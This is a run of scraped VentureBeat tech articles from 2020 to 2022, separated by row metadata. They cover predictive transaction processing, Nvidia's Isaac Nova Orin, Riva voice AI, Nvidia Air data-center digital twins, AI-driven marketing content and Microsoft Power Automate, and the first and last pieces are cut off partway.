the customer. A transformative new model Since the dawn of computing, transaction processing has been performed in much the same way. The user makes a request, the request is processed, and if you’re lucky, afterwards the user’s choices are analysed. This is what happens across many platforms today. When I buy a product from Amazon machine learning may be used to make recommendations. But the decision to purchase is fundamentally something that I, the customer, must make. When I browse Netflix, it will algorithmically suggest content that I may like to watch, but once again I must make the choice to hit play. We call this “artificial intelligence” but I think this is not smart enough. The real transformation will happen when we move to a predictive computing model. Picture this: You’ve just got home from work, and an Amazon delivery truck arrives at your door, carrying the 25 household items, from dry groceries to cleaning supplies, you’ll need that week, informed by your in-depth customer profile. Any of the items you don’t need (an unlikely occasion given the enhanced machine learning) can easily be returned – information which adds to the database that continually improves the engine’s learning and ability to predict your behavior. The use case is clear – when transactions move from enhancing decisions (i.e. recommended bundle items) to predicting purchase decisions, consumers will be able to let Amazon handle their daily purchases, giving them back time in their busy lives. In terms of logistics, last-mile delivery technology will ensure that people get what they want when they need, easing the traffic congestion caused by delivery trucks currently hindered by uncertain time frames and unavailable customers. Given Amazon’s sophisticated logistics and data assets, this scenario isn’t hard to imagine. Amazon has data on your shopping habits from a lifetime of purchases. It has your credit card details. And it has the unrivalled ability to ship goods quickly at scale. The same can be true for Netflix, and other entertainment platforms like Spotify. They know our habits, so why wait for us to tell them what they already know before they entertain us? As Benedict Evans says , a computer should never ask a question it knows the answer to. This, however, is only the beginning. The Predictive Transaction Processing model is not just an opportunity to improve our lives, existing systems and business models. It will be critical for unlocking the transformative technologies of the future. Take autonomous vehicles, for example. We are not going to reach “Level 5” autonomy if the car only has its own built-in sensors to rely on. We need all the cars, from the human-driven ones to cloud learning vehicles, for the risks on the road ahead to be computed using data collected by every autonomous vehicle. And we need this computation to be predictive, to steer our vehicles in anticipation of the dangers that lie ahead. By acting using the predictive model, based on data, automotive accidents can be a thing of the past. Predictive transactions will become crucial to industries from DTC commerce and entertainment to transportation, logistics, and even healthcare – as each stands to reap the benefits from this incredibly incisive insight into their customer/client base and their habits. Putting the building blocks in place There are already companies taking tentative steps towards the predictive future. Most notably, there is ByteDance’s TikTok. With $34bn revenue in 2020 it is the most profitable predictive transaction processing app ever created. Open the app and you will be presented with an endless stream of autoplaying short form videos. As you watch, the algorithm will learn what you like based not on your stated preference, but on your revealed preference. In other words, if you’re spending longer watching videos of pets than people singing or performing stunts, the app will show you more pets, without you ever needing to press play or type words into a search box. Companies that are being built today need to follow ByteDance’s example and invest and build the key technologies that will move us towards the Predictive Transaction Processing model. As part of the shift from user-instrumented interactions to decisions made by learning systems and data, we will need to retool and redesign the entire technology stack. For example, we will need improved machine learning models that are more precise in their predictions, as marginal gains will make the difference when they are cascaded through a logistics chain. We will also need learning systems that can look backwards and correct for previous mistakes, so that errors are not compounded. We will also need to replace long-held sacred cows, such as the J2EE standards that have unpinned ecommerce for a generation. Applications based on learning from data are very different to those based on the traditional relational database. We will also need new development and debugging tools, such as new lower-level programming languages to enable us to interrogate data more effectively. Application integration will also increase in complexity as apps will be entirely driven by data rather than design. And ultimately, there will need to be a step change in the reliability of real time transaction processing applications. If predictive data is to be mission critical, we need platforms and products that reduce downtime, enable instant recovery and have automatic failover capabilities. The real opportunity The Predictive Transaction Processing revolution is imminent. It may be the most exciting innovation that enterprise computing has ever seen. When the technological building blocks fall into place and apps finally come to market, the impact will be felt immediately. The number of transactions on predictive platforms will skyrocket. There will be enormous opportunities to improve the efficiency of existing systems, and a lucrative role for the ecosystem of companies that create the middleware that make it possible. And the SaaS enterprise platforms that dominate today will risk becoming obsolete. So it’s time to embrace Predictive Transaction Processing, and wise investors will take a lesson from this new paradigm: It’s time to look forward, and make decisions now about where to put your money knowing what is coming. Alfred Chuang is General Partner at Race Capital (Databricks, FTX, Solana, Opaque), where he invests heavily in data infrastructure. Prior to this he was co-founder and former Chairman & CEO of BEA Systems and led its acquisition by Oracle for $8.6 billion. DataDecisionMakers Welcome to the VentureBeat community! DataDecisionMakers is where experts, including the technical people doing data work, can share data-related insights and innovation. If you want to read about cutting-edge ideas and up-to-date information, best practices, and the future of data and data tech, join us at DataDecisionMakers. You might even consider contributing an article of your own! Read More From DataDecisionMakers The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! DataDecisionMakers Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,137
2,022
"Nvidia debuts new hardware targeting the edge, including Isaac Nova Orin | VentureBeat"
"https://venturebeat.com/2022/03/22/nvidia-debuts-new-hardware-targeting-the-edge-including-isaac-nova-orin"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Nvidia debuts new hardware targeting the edge, including Isaac Nova Orin Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Follow along with VentureBeat’s ongoing coverage from Nvidia’s GTC 2022 event. >> During its March 2022 GPU Technology Conference (GTC) this week, Nvidia unveiled Isaac Nova Orin, a computing and sensor architecture powered by the company’s Jetson AGX Orin hardware. Nvidia says that Isaac Nova Orin comes with “all the compute and sensor hardware needed to design, build, and test autonomy” in autonomous mobile robots (AMRs) — types of robots that can understand and move through their environment without being overseen directly by an operator. Warehousing and logistics organizations among others apply AMRs to tasks that’d be harmful to — or not possible for — teams of human workers. Using AI, compute, and a sophisticated set of sensors, AMRs can carry heavy loads while dynamically assessing and responding to their surroundings — assisting with tasks including locating, picking, and moving inventory. An IDC survey found that over 70% of order fulfillment operations and warehouses that deploy AMRs have experienced double-digit improvement in KPIs like cycle time, productivity, and inventory efficiency. (Cycle time refers to the amount of time a team spends actually working on producing an item until the item is ready for shipment.) That’s perhaps why the global AMR market was worth roughly $1.67 million in 2020, according to Fortune Business Insights, and projected to growth to $8.7 billion by 2028. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Isaac Nova Orin and Jetson AGX Orin Isaac Nova Orin, which will be available later this year, pairs two Jetson AGX Orin units to deliver up to 550 TOPS of power. In hardware, TOPS — which stands for “trillions of operations per second” — indicates how many computing operations, or basic math problems, a chip can handle over a short period of time. As my former colleague Jeremy Horowitz notes, TOPS , while often touted in marketing materials, aren’t necessarily the best way to measure a chip’s capabilities. But Nvidia is spotlighting Isaac Nova Orin’s other features, like its ability to process data in real time from up to six cameras, three lidars, and eight ultrasonic sensors from an AMR. Over-the-air software management support is “preintegrated” in Isaac Nova Orin and the hardware is “calibrated and tested to work out of the box,” Nvidia says. Isaac Nova Orin includes tools necessary to simulate the robot as well as software modules designed to accelerate perception and navigation tasks and map different robots’ environments. Alongside Isaac Nova Orin, Nvidia announced that the Jetson AGX Orin developer kit, which the company first detailed in November, is now available to customers for purchase. Readers will recall that Jetson AGX Orin delivers 275 TOPS of compute power and features Nvidia’s Ampere architecture GPU, Arm Cortex-A78AE CPUs, AI and vision accelerators, and high-speed chip-to-chip interfaces. Microsoft, John Deere, Amazon, Hyundai, and JD.com are among the early adopters of Jetson AGX Orin. Developer kits start at $1,999, and production modules will be available in Q4 2022 for $399. “As AI transforms manufacturing, healthcare, retail, transportation, smart cities and other essential sectors of the economy, demand for processing continues to surge,” Deepu Talla, VP of embedded and edge computing at Nvidia, said in a press release. “A million developers and more than 6,000 companies have already turned to Jetson. The availability of Jetson AGX Orin will supercharge the efforts of the entire industry as it builds the next generation of robotics and edge AI products.” Edge opportunity With Isaac Nova Orin and Jetson AGX Orin, Nvidia is competing for a slice of the rapidly growing edge computing segment. Generally speaking, “edge computing” encompasses computing and storage resources at the location where data is produced, including on — or near — AMRs. STL Partners recently estimated that the edge computing addressable market will grow from $10 billion in size in 2020 to $543 billion in 2030. Edge computing offers several advantages compared with cloud-based technologies, but it isn’t without challenges. Keeping data locally means more locations to protect, with increased physical access allowing for different kinds of cyberattacks. (Some experts argue the decentralized nature of edge computing leads to increased security.) And compute is limited at the edge, which restricts the number of tasks that can be performed. Even so, Gartner predicts that more than 50% of large organizations will deploy at least one edge computing application to support the internet of things or immersive experiences by the end of 2021, up from less than 5% in 2019. The number of edge computing use cases could jump even further in the upcoming years, with the firm expecting that more than half of large enterprises will have at least six edge computing use cases deployed by the end of 2023. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,138
2,022
"AI Weekly: Nvidia's commitment to voice AI -- and a farewell | VentureBeat"
"https://venturebeat.com/2022/03/25/ai-weekly-nvidias-commitment-to-voice-ai-and-a-farewell"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages AI Weekly: Nvidia’s commitment to voice AI — and a farewell Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. This week, Nvidia announced a slew of AI-focused hardware and software innovations during its March GTC 2022 conference. The company unveiled the Grace CPU Superchip , a data center processor designed to serve high-performance compute and AI applications. And it detailed the H100, the first in a new line of GPU hardware aimed at accelerating AI workloads including training large natural language models. But one announcement that slipped under the radar was the general availability of Nvidia’s Riva 2.0 SDK, as well as the company’s Riva Enterprise managed offering. Both can be deployed for building speech AI applications and point to the growing market for speech recognition in particular. The speech and voice recognition market is expected to grow from $8.3 billion in 2021 to $22.0 billion by 2026, according to Markets and Markets, driven by enterprise applications. In 2018, a Pindrop survey of 500 IT and business decision-makers found that 28% were using voice technology with customers. Gartner, meanwhile, predicted in 2019 that 25% of digital workers will use virtual employee assistants daily by 2021. And a recent Opus survey found that 73% of executives see value in AI voice technologies for “operational efficiency.” “As speech AI is expanding to new applications, data scientists at enterprises are looking to develop, customize and deploy speech applications,” an Nvidia spokesperson told VentureBeat via email. “Riva 2.0 includes strong integration with TAO , a low code solution for data scientists, to customize and deploy speech applications. This is an active area of focus and we plan to make the workflow even more accessible for customers in the future. We have also introduced Riva on embedded platforms for early access, and will have more to share at a later date.” VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Nvidia says that Snap, the company behind Snapchat, has integrated Riva’s automatic speech recognition and text to speech technologies into their developer platform. RingCentral, another customer, is leveraging Riva’s automatic speech recognition for video conferencing live-captioning. Speech technologies span voice generation tools, too, including “voice cloning” tools that use AI to mimic the pitch and prosody of a person’s speech. Last fall, Nvidia unveiled Riva Custom Voice , a new toolkit that the company claims can enable customers to create custom, “human-like” voices with only 30 minutes of speech recording data. Brand voices like Progressive’s Flo are often tasked with recording phone trees and elearning scripts in corporate training video series. For companies, the costs can add up — one source pegs the average hourly rate for voice actors at $39.63, plus additional fees for interactive voice response (IVR) prompts. Synthetization could boost actors’ productivity by cutting down on the need for additional recordings, potentially freeing the actors up to pursue more creative work — and saving businesses money in the process. According to Markets and Markets, the global voice cloning market could grow from $456 million in value in 2018 to $1.739 billion by 2023. As far as what lies on the horizon, Nvidia sees new voice applications going into production across augmented reality, videoconferencing, and conversational AI. Customers’ expectations and focus are on high accuracy as well as ways to customize voice experiences, the company says. “Low-code solutions for speech AI [will continue to grow] as non-software developers are looking to build, fine-tune, and deploy speech solutions,” the spokesperson continued, referencing low-code development platforms that require little to no coding in order to build voice apps. “New research is bringing emotional text-to-speech, transforming how humans will interact with machines.” Exciting as these technologies are, they will — and already have — introduced new ethical challenges. For example, fraudsters have used cloning to imitate a CEO’s voice well enough to initiate a wire transfer. And some speech recognition and text-to-speech algorithms have been shown to recognize the voices of minority users less accurately than those with more common inflections. It’s incumbent on companies like Nvidia to make efforts to address these challenges before deploying their technologies into production. To its credit, the company has taken steps in the right direction, for example prohibiting the use of Riva for the creation of “fraudulent, false, misleading, or deceptive” content as well as content that “promote[s] discrimination, bigotry, racism, hatred, harassment, or harm against any individual or group.” Hopefully, there’s more along this vein to come. A farewell As an addendum to this week’s newsletter, it’s with sadness that I announce I’m leaving VentureBeat to pursue professional opportunities elsewhere. This edition of AI Weekly will be my last — a bittersweet realization, indeed, as I try to find the words to put to paper. When I joined VentureBeat as an AI staff writer four years ago, I had only the vaguest notion of the difficult journey that lay ahead. I wasn’t exceptionally well-versed in AI — my background was in consumer tech — and the industry’s jargon was overwhelming to me, not to mention contradictory. But as I came to learn particularly from those on the academic side of data science, an open mind — and a willingness to admit ignorance, frankly — is perhaps the most important ingredient in making sense of AI. I haven’t always been successful in this. But as a reporter, I’ve tried not to lose sight of the fact that my domain knowledge pales in comparison to that of titans of industry and academia. Whether tackling stories about biases in computer vision models or the environmental impact of training language systems, it’s my policy to lean on others for their expert perspectives and present these perspectives, lightly edited, to readers. As I see it, my job is to contextualize and rely on, not to pontificate. There’s a place for pontification, but it’s on opinion pages — not news articles. I’ve learned a healthy dose of skepticism goes a long way, too, in reporting on AI. It’s not only the snake oil salesmen one must be wary of, but the corporations with well-oiled PR operations, lobbyists, and paid consultants claiming to prevent harms but in fact doing the opposite. I’ve lost track of the number of ethics boards that’ve been dissolved or have proven to be toothless; the number of damaging algorithms have been sold through to customers; and number of companies have attempted to silence or push back against whistleblowers. The silver lining is regulators’ growing realization of the industry’s deception. But, as elsewhere in Silicon Valley, techno-optimism has revealed itself to be little more than a publicity instrument. It’s easy to get swept up in the novelty of new technology. I once did — and still do. The challenge is recognizing the danger in this novelty. I’m reminded of the novel When We Cease to Understand the World by the Chilean writer Benjamín Labatut, which examines great scientific discoveries that led to prosperity and untold suffering in equal parts. For example, German chemist Fritz Haber developed the Haber-Bosch process, which synthesizes ammonia from nitrogen and hydrogen gases and almost certainly prevented famine by enabling the mass manufacture of fertilizer. At the same time, the Haber-Bosch process simplified and made cheaper the production of explosives, contributing to millions of deaths suffered by soldiers during World War I. AI, like the Haber-Bosch process, has the potential for enormous good — and good actors are trying desperately to bring this to fruition. But any technology can be misused, and it’s the job of reporters to uncover and spotlight those misuses — ideally to affect change. It’s my hope that I, along with my distinguished colleagues at VentureBeat, have accomplished this in some small part. Here’s to a future of strong AI reporting. For AI coverage, be sure to subscribe to the AI Weekly newsletter and bookmark our AI channel, The Machine. Thanks for reading, Kyle Wiggers Senior AI Staff Writer VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,139
2,022
"Nvidia Air gives new meaning to infrastructure-as-code | VentureBeat"
"https://venturebeat.com/2022/03/25/nvidia-air-gives-new-meaning-to-infrastructure-as-code"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Nvidia Air gives new meaning to infrastructure-as-code Share on Facebook Share on X Share on LinkedIn Digital generated image of cityscape data. Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Follow along with VentureBeat’s coverage from Nvidia’s GTC 2022 event >> Enterprises increasingly leverage infrastructure-as-code (IaC) to systematically provision cloud resources and containerized workloads. IaC is a critical element of modern software development pipelines that ensures consistency and helps enterprises respond to problems or experiment with new business ideas. At the Nvidia GTC conference, Nvidia engineers described their work to build a digital twin of data center infrastructure. This work promises to extend IaC and continuous integration/continuous deployment practices all the way into physical data center design. Nvidia has been using these new tools internally to improve its own data center design and is now starting to integrate them into Nvidia Air. This complements other digital twins offerings like Nvidia Drive for autonomous vehicles, Isaac for Robots and Clara for healthcare. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Nvidia Air will allow enterprises to build a full digital twin of a data center’s physical and logical layout before installing the first switch in the data center. They can then continue to use those same simulations, visualizations and AI tools once the data center is in production. Today, most of the design assets are essentially filed away and forgotten once a data center goes live, which in many respects mirrors the old waterfall style of test and development before Agile came along. Lost assets These challenges are only growing in complexity with the need for new AI infrastructure that stretches the limits of compute, networking, storage, power and thermal management. “Many classic supercomputers cost millions of dollars and take months or even years to deploy,” said Marc Hamilton, vice president of solutions architecture and engineering at Nvidia. Designing a data center is an extremely complex team sport with diverse skills. The data center building itself and the layout of racks and other components might be done in Autodesk. The cables, servers, switches and storage are designed with various 3D CAD tools. Teams often turn to other tools for modeling airflow and heat using computational fluid dynamics simulations from Ansys. These kinds of simulations are usually done in design, but once the computer goes into production, the operations team never sees them. If a problem arises, the operations team needs to start over again to figure out how to improve airflow or address an overheating issue. Nvidia worked with design tools from many vendors in the past, and the resulting files were incompatible across engineering teams. It was generally a time-consuming process to transfer files across tools, and, in some cases, the formats were not compatible. If an engineer changed the layout to improve the thermal properties, it wasn’t always propagated back to the team designing heat sinks or cable routing. Design for reuse So Nvidia turned to the Omniverse to see if there was a better way to connect these workflows. Omniverse is built on top of a common database called Nucleus, which allows all engineering tools to stage their data in a shared format across tools and teams. The Omniverse helps teams go back and forth between the photorealistic rendering of the data center as-built, overlaid with live thermal data, to analyze the predicted impact of various changes, such as moving two busy servers further apart. Most engineering simulation is done with high-performance workstations. The Omniverse allows teams to move more of the complex engineering and simulation workloads to tens of thousands of GPUs in the cloud and then share the result across the enterprise and partners. Another advantage of connecting back to the Omniverse is that new simulations can take advantage of improvements in the core algorithms. One of the biggest aspects of data center design is the computational fluid dynamics to understand the system’s airflow, heating and cooling. Hamilton’s team worked with Nvidia Modulus, a software development kit that uses AI to build surrogate models for physics. This allows them to simulate far more scenarios, such as minor differences in temperature settings or physical placement in the same amount of time. Now Nvidia is extending these modeling capabilities into its data center management tools called Base Command. This provides a set of tools to monitor and manage services. Today, if conditions change in the data center, such as a temperature spike, teams only have a rough idea of what might have caused it. Now Nvidia is exploring ways to extend Omniverse simulation capabilities to support logical infrastructure as well. This will make it easier to develop and test best practices for setting up networks, running power lines, and other things. This was one of the reasons Nvidia acquired Mellanox. “We started thinking about how to apply tools like omniverse to simulating, predicting, and monitoring before you make changes to the network,” Hamilton said. Devops for hardware Amit Katz, vice president of the Nvidia Spectrum Platform, said the use of digital twins in data center designs is akin to the adoption of automation in the data center at the turn of the century. In the 1990s, engineers would typically type CLI command into live data center environments. And sometimes, they would type the wrong commands. Then around the turn of the century, developers started provisioning IaC and developing against test environments that mimicked the real thing. Tools like Service Virtualization and test harnesses allowed teams to simulate API calls to enterprise and third-party services before pushing things into production. Now in 2022, he believes the world is going through a similar transition to simulate physical infrastructure as well. Katz said, “We are seeing digital twins for end-to-end data center validation, not only for switches but also for the entire data center.” Down the road, Nvidia Air could work as a recommendation engine for suggesting and prioritizing fixes and changes to data center designs and layout. This could also simplify the exchange of assets and configurations across teams. In the same way that IaC ensured that developer, test and operations teams were working with the same code. This will extend those same benefits across developers, network operators and data scientists that use this infrastructure. The vision is that the digital twin helps teams lay out the data center down to each cable run. Then as teams start to install systems, the digital twin makes it easier to ensure that each cable is run correctly, and, if not, what needs to change. Then if something goes wrong, such as an outage or a power supply goes down, the digital twin could help test out different remedies. Teams could test out various fixes beforehand to make changes with higher confidence of success. This would help complete the loop between the greater flexibility available in the cloud with the better economics available for on-premise deployments. “You can think of it as cloud agility with on-prem economics,” Katz said. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,140
2,021
"Accelerate your marketing plan by leveraging AI for content creation | VentureBeat"
"https://venturebeat.com/2021/11/24/accelerate-your-marketing-plan-by-leveraging-ai-for-content-creation"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Community Accelerate your marketing plan by leveraging AI for content creation Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. This article was contributed by Ajay Mangilal Jain, Senior Partner of AI & Automation Practice at Wipro Limited Ecommerce has long been growing in popularity with private consumers and enterprises alike, but the pandemic drove an unprecedented flurry of activity even from segments that hadn’t previously embraced online shopping. With this rapid growth, and with customers’ evolved expectations for timing and delivery, there is a growing need for direct-to-consumer brands to accelerate their marketing capabilities. At the center of this trend is the need for content, which must now be scaled across different platforms and segments quickly and intelligently. However, this process is very demanding, and effective content creation for multiple platforms — including ecommerce — is almost impossible without appropriate artificial intelligence (AI) and machine learning (ML) infrastructure. When AI succeeds, so do content and content creation To influence people, companies need to say something smart and relevant to the customer. Great content resonates, creates relevance, and influences behavior. Creating this kind of content requires analyzing data across multiple platforms, evaluating response rates to different materials, and diving into customer sentiment and engagement. Unfortunately, all of this takes time, lots of time. AI and ML have the potential to speed up this process. AI has the ability to analyze large quantities of data and make recommendations about the content most likely to elicit the intended response. This automated analysis helps companies generate meaningful content and scale-up content development so that it is ideally suited for different platforms and market segments. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Historically, direct-to-consumer brands have relied on AI and ML primarily for social listening and insights. While some social platforms have introduced in-app shopping, the majority of consumers still make purchases through traditional channels, and their social-media use is focused on product research. This makes social media a great place to influence consumer behavior and capture data. AI and ML consolidate data from these platforms — analyzing context, relevance, sentiment, and feedback to determine what motivates the consumer and predict the best performing content for each scenario. Using AI/ML to extend ecommerce AI and ML can play a key role in the development of ecommerce content as well. With more purchases taking place online, new ways have emerged to meet demand. This has introduced new complexities for content marketers as direct-to-consumer companies look to extend their presence to other platforms and commerce channels. By leveraging AI and ML , companies can overcome those complexities while increasing their visibility across platforms and gaining insights that ultimately drive growth. Consider the case of an international chocolate brand. At the start of 2019, the company had a sales presence both on its own website and a prominent ecommerce retail website, where it hosted a number of product pages to address various segments and test different keywords and images. The marketing team used the platform to analyze the most successful pages and determine which elements consumers found most relevant. In addition, the team had to determine what search data was also most relevant. The brand wanted to extend its online sales presence to additional retail websites and social platforms. This expansion, while promising, would essentially “trap” each outlet’s consumer behavior and sentiment data inside the respective platform. The challenge would then become how best to efficiently analyze what resonated with each platform’s audience and continue creating effective “feel-good” content that sets the company apart from its competition. By leveraging AI and ML, the chocolate brand was able to capture and combine data from its ecommerce channels, its own product site(s), and all the new platforms. The AI-enabled ability to gather and analyze content for each product, segment, and platform allowed the company to rapidly scale up and create the most relevant content for each digital property. In addition, the increased efficiency accelerated the content creation that resonated with target consumers, while also resulting in higher page visits and increased sales. While AI and ML are often viewed as a technology with limited applications outside of dry data analysis, they can in fact be used to fuel creativity. These tools enable companies to analyze branded content from multiple systems, create bridges between platforms, enhance content creation, as well as to empower their marketing teams to create and scale the most relevant content across multiple platforms. Infusing AI into a marketing strategy helps direct-to-consumer brands quickly identify content that resonates, creates relevance, and influences behavior. All of these functions provide companies the ability to quickly scale and react to sentiment changes in real time. Ajay Mangilal Jain is Senior Partner of AI & Automation Practice at Wipro Limited DataDecisionMakers Welcome to the VentureBeat community! DataDecisionMakers is where experts, including the technical people doing data work, can share data-related insights and innovation. If you want to read about cutting-edge ideas and up-to-date information, best practices, and the future of data and data tech, join us at DataDecisionMakers. You might even consider contributing an article of your own! Read More From DataDecisionMakers The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! DataDecisionMakers Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,141
2,020
"Microsoft debuts Power Automate process advisor and new RPA features | VentureBeat"
"https://venturebeat.com/2020/12/09/microsoft-power-automate-process-advisor-rpa-features"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Microsoft debuts Power Automate process advisor and new RPA features Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Microsoft today announced the public preview of process advisor, a process mining capability in Power Automate that identifies processes for automation. At the same time, Microsoft Power Automate Desktop has hit general availability, marrying robotic process automation (RPA) capabilities to a desktop authoring experience. Microsoft today also added four RPA enhancements to Power Automate: role-based sharing, lifecycle management, setting execution priorities, and real-time run and queue monitoring. RPA is a form of business process automation that relies on bots or AI workers to eliminate repetitive tasks so humans can do what they do best. In November 2019, Microsoft renamed its IFTTT competitor Microsoft Flow as Power Automate to align with its Power Platform , a business tool that lets anyone analyze, act, and automate across their organization. With today’s updates, Microsoft is focusing on RPA features that help companies find the tasks best fit for automation. Power Automate Desktop extends the automation capabilities in Power Automate to on-premises processes and tasks. Now that it’s generally available, anyone in the organization can automate desktop or web-based applications. Power Automate Desktop unifies API-based automation with cloud flows (also known as Digital Process Automation) and UI-based automation with desktop flows (previously called “UI flows”). RPA in Power Automate can do a lot, but it can’t identify workflow bottlenecks that slow your business down. That’s where process advisor comes in. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Power Automate’s process advisor Power Automate now shows how processes are being performed, helping you visualize and analyze them for automation. The process advisor can surface insights about time-consuming processes across your organization. Ideally, the processes that demand the most manual time and resources should be automated. Here’s how it works. Process advisor runs process recorders to capture the detailed steps for each process, creates process maps to show an end-to-end visualization of the variations, and provides analytics to improve processes by viewing each current variation. It takes five steps: Create: Identify and create the process about which you want to gain insights. Share: Invite colleagues to collaborate and add new recordings. Record: Record the actions either you or your colleagues take to complete the process at hand. Annotate/Edit: Remove sensitive information, then group your actions into meaningful activities. Analyze: Generate a process map where you can analyze it and get insights. Key insights include how many people recorded the task, the average time it takes to complete a task, how many different paths your users took, and so on. New RPA enhancements Power Automate is gaining role-based sharing so companies can share desktop flows, letting multiple users develop automation scripts. Users can then embed these desktop flows in end-to-end processes they are automating. They can also control who can run, edit, and share a desktop flow, letting front-line workers use or contribute as well. Lifecyle management covers end-to-end creation and movement of desktop flows across any tenant environment. You can add desktop flows along with related assets, such as cloud flows, a Power App, or a Power Virtual agent. These can then be exported and imported in a user’s tenant for development, test, or production. Next, you can now prioritize which desktop flows run on your machines first based on importance. Power Automate offers a new Priority property to the desktop flows connector that lets you set this either statically or based on dynamic content. You can, for example, prioritize a desktop flow based on the importance of the email that triggered it by setting the Importance field as the priority value. Finally, you can see the health and success of your desktop flow runs with real-time monitoring. Power Automate has gained a new 